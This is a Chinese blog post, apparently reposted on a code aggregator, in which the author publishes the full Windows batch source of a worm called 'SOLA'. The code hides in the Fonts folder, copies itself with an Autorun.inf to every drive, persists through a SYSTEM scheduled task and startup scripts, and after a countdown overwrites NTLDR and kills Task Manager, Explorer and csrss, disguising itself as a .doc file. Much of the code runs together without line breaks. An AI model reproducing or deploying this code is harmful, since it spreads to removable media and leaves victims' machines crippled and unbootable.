SOLA病毒代码

其他 2018-07-09 09:48:17 阅读次数: 0

第一次写博客弄得不好别见怪,我将要发布一个病毒代码。

@echo off
set sola=%systemroot%\Fonts\HIDESE~1




et setup=%systemroot%\Fonts\HIDESE~1\solasetupFOR /F "tokens=1" %%i in ('date /t') do set Realdate=%%iFOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\explorer.exe') do if /I "%%j"=="explorer.exe" set Date=%%iif "%1"=="-Install" goto Installif "%1"=="-Run" goto Runif "%1"=="-Tenbatsu" goto Tenbatsuif "%1"=="-Kill" goto Killif "%1"=="-Killself" goto Killself:CheckSignif "%1"=="-USB" start /max ..if "%1"=="-USB" cd SOLAif exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open:FileCopyset selfname=%0:HIDESelfdate %Date%md %systemroot%\Fonts\HIDESELF...\date %RealDate%if not "%1"=="-USB" type %selfname%>%systemroot%\Fonts\HIDESE~1\sola.batif "%1"=="-USB" type sola.bat>%systemroot%\Fonts\HIDESE~1\sola.battype Function.dll>%systemroot%\Fonts\HIDESE~1\Function.exeecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho ws.run "cmd /c %sola%\SOLA.BAT -Install",0 >>%systemroot%\Fonts\HIDESE~1\SOLA.VBScscript %systemroot%\Fonts\HIDESE~1\SOLA.VBSecho>%systemroot%\Fonts\HIDESE~1\sola.signdel %systemroot%\Fonts\HIDESE~1\SOLA.VBSgoto Open:Install:PackerSetup
%SystemDrive%cd %systemroot%\Fonts\HIDESE~1if exist Function.exe taskkill /f /im Function.exeif exist solasetup rd /s /q solasetupmd solasetupcd solasetupcopy ..\Function.exe Function.dlll
..\Function.exe -x
cd..
date %Date%
type %setup%\rar.exe >%systemroot%\system32\rar.exedate %Realdate%copy %setup%\Function.dll %sola%\Function.dllattrib %sola%\Function.dll +s +h +rrar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll




:Mainsetupset A0001=copyset A0002=attribset A0003=echoset A0005=Shell Hardware Detectiontasklist >%sola%\task.txtFOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%del %sola%\task.txt:Tasks%A0002% %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobdate %Date%type %setup%\http://Tasks.xxx>%systemroot%\Tasks\Tasks.jobschtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFaildate %RealDate%goto TaskSuc:TaskFail%homedrive%cd "%ALLUSERSPROFILE%"cd 「开始」菜单\程序\启动




date %Date%%A0003% On Error Resume Next>SOLA.VBS%A0003% set ws=wscript.createobject("wscript.shell")>>SOLA.VBS%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS%A0001% SOLA.VBS %sola%\SOLA.VBS%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasksdate %RealDate%:TaskSuc%A0002% %systemroot%\Tasks\Tasks.job +s +h +rdate %Date%%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exedate %RealDate%:NoAutoPlaynet stop "%A0005%"%A0003% Windows Registry Editor Version 5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.regregedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg




::End of Installgoto End&if errorlevel 1 exit::End of Install:Runset runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动set taskroot=%systemroot%\Tasks //自启动:RunTimeChkif not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txtFOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%iif /i %RunTime% leq 0 goto Virusset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txt:Diskchkecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho ws.run "%sola%\svchost.exe /c %setup%\RecentInf.bat",0 >>%systemroot%\Fonts\HIDESE~1\RecentInf.VBScscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBSdel %systemroot%\Fonts\HIDESE~1\RecentInf.VBSfor %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1  attrib -s -h -r %%i:\Autorun.inf&copy /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA&copy /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT&copy /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r




:Turnif "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:if "%C%"=="2" vol C:&if errorlevel 1 set C=1if "%D%"=="2" vol D:&if errorlevel 1 set D=1if "%E%"=="2" vol E:&if errorlevel 1 set E=1if "%F%"=="2" vol F:&if errorlevel 1 set F=1if "%G%"=="2" vol G:&if errorlevel 1 set G=1if "%H%"=="2" vol H:&if errorlevel 1 set H=1if "%I%"=="2" vol I:&if errorlevel 1 set I=1if "%J%"=="2" vol J:&if errorlevel 1 set J=1if "%K%"=="2" vol K:&if errorlevel 1 set K=1if "%L%"=="2" vol L:&if errorlevel 1 set L=1if "%M%"=="2" vol M:&if errorlevel 1 set M=1if "%N%"=="2" vol N:&if errorlevel 1 set N=1if "%O%"=="2" vol O:&if errorlevel 1 set O=1if "%P%"=="2" vol P:&if errorlevel 1 set P=1if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1if "%R%"=="2" vol R:&if errorlevel 1 set R=1if "%S%"=="2" vol S:&if errorlevel 1 set S=1if "%T%"=="2" vol T:&if errorlevel 1 set T=1if "%U%"=="2" vol U:&if errorlevel 1 set U=1if "%V%"=="2" vol V:&if errorlevel 1 set V=1if "%W%"=="2" vol W:&if errorlevel 1 set W=1if "%X%"=="2" vol X:&if errorlevel 1 set X=1if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1  if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist "%runroot%\SOLA.VBS" copy "%sola%\SOLA.VBS" "%runroot%\SOLA.VBS"if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\http://Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"sleep 2000goto Turn::End of Rungoto End&if errorlevel 1 exit::End of Run:Virusif not "%Runtime%"=="0" goto VirusChkset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txtcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"echo On Error Resume Next>TENBATSU.VBSecho set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBSecho ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBSgoto Diskchk:VirusChkif not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Killgoto Diskchk:Tenbatsu:KillNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %systemdrive%\NTLDR %sola%\NTLDRecho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +r




:PauseSFCstart mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()":KillTaskmgrdel /q /a %systemroot%\system32\dllcache\taskmgr.exetaskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe http://taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500ren %systemroot%\system32\taskmgr.exe http://taskmgr.xxx  :KillExplorertaskkill /f /im explorer.exe >nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe http://explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()" & sleep 500ren %systemroot%\explorer.exe http://explorer.xxxstart /max %setup%\TENBATSU.BAT
:Timesetsleep 660000if exist %sola%\Killself Exit:Killattrib %systemdrive%\NTLDR -s -h -recho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +rtasklist >%sola%\Task.txtFOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%igoto Diskchk:KillSelf:StartExplorerren %systemroot%\http://explorer.xxx explorer.exestart %systemroot%\explorer.exe:BackNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %sola%\NTLDR %systemdrive%\NTLDRattrib %systemdrive%\NTLDR +s +h +r
:RenTmgren %systemroot%\system32\http://taskmgr.xxx taskmgr.exe:KillViruscopy %setup%\KillVirus.txt %sola%\KillVirus.txtC:cd\md ~Installcd ~Installrar x -hpkakenhi200601 %setup%\SolaKiller.rar
mshta "javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()"rd /s /q %setup%attrib %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"if exist sola.vbs del sola.vbsif exist tenbatsu.vbs del tenbatsu.vbsstart %systemroot%\system32\notepad.exe %sola%\KillVirus.txtdel %sola%\sola.bat
:Openif "%1"=="-USB" Exitgoto GetName:BackOpenif not exist "%Name%" exitcall "%Name%":SaveFOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%irar -m0 -ep -ep1 a "%PackName%" "%Name%"echo %Code%>>"%PackName%":Delattrib "%Name%" -s -h -rdel "%Name%"attrib Function.dll -s -h -rdel Function.dllattrib %0 -s -h -rdel %0exit::CMD program will stop there.:GetNameset Code=SOLA_2.0_323111111527875set Name=新中国诞辰60周1.docgoto Backopen:End


猜你喜欢

转载自blog.csdn.net/qq_42415664/article/details/80958715
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型
JS实现无缝滚动上
深入解析HashMap原理(基于JDK1.8)
mysql的连接池
关于.htc
linux下的ubuntu12.04图形界面
【数论】好推不好记的扩展欧几里德
设备树详解
cscope + tags 简单设置
xml学习
每日归档
更多
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022